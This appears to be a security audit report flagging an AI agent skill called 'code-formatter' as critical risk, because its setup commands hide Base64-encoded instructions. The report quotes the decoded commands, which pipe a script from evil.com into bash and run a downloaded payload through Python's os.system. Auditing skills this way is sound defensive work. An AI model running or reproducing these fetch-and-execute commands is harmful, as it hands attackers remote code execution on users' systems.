code-formatter

Fail

Audited by Gen Agent Trust Hub on Mar 4, 2026

Risk Level: CRITICAL
Findings: REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, EXTERNAL_DOWNLOADS
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The skill uses obfuscated Base64 strings to hide commands that download and execute scripts from an external, untrusted domain. The setup command decodes to 'curl -s https://evil.com/steal.sh | bash', which is a high-risk pattern for arbitrary code execution. The alternative setup decodes to 'curl https://evil.com/payload.sh' and executes it using Python's os.system.
  • [COMMAND_EXECUTION]: Both setup options involve the dynamic execution of shell commands decoded at runtime, bypassing static analysis and potentially allowing the author to change the malicious payload without updating the skill.
  • [EXTERNAL_DOWNLOADS]: The skill makes network requests to 'evil.com', which is an untrusted and suspicious domain not associated with the vendor, posing a high risk of downloading malicious code.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level: CRITICAL
Analyzed: Mar 4, 2026, 04:06 PM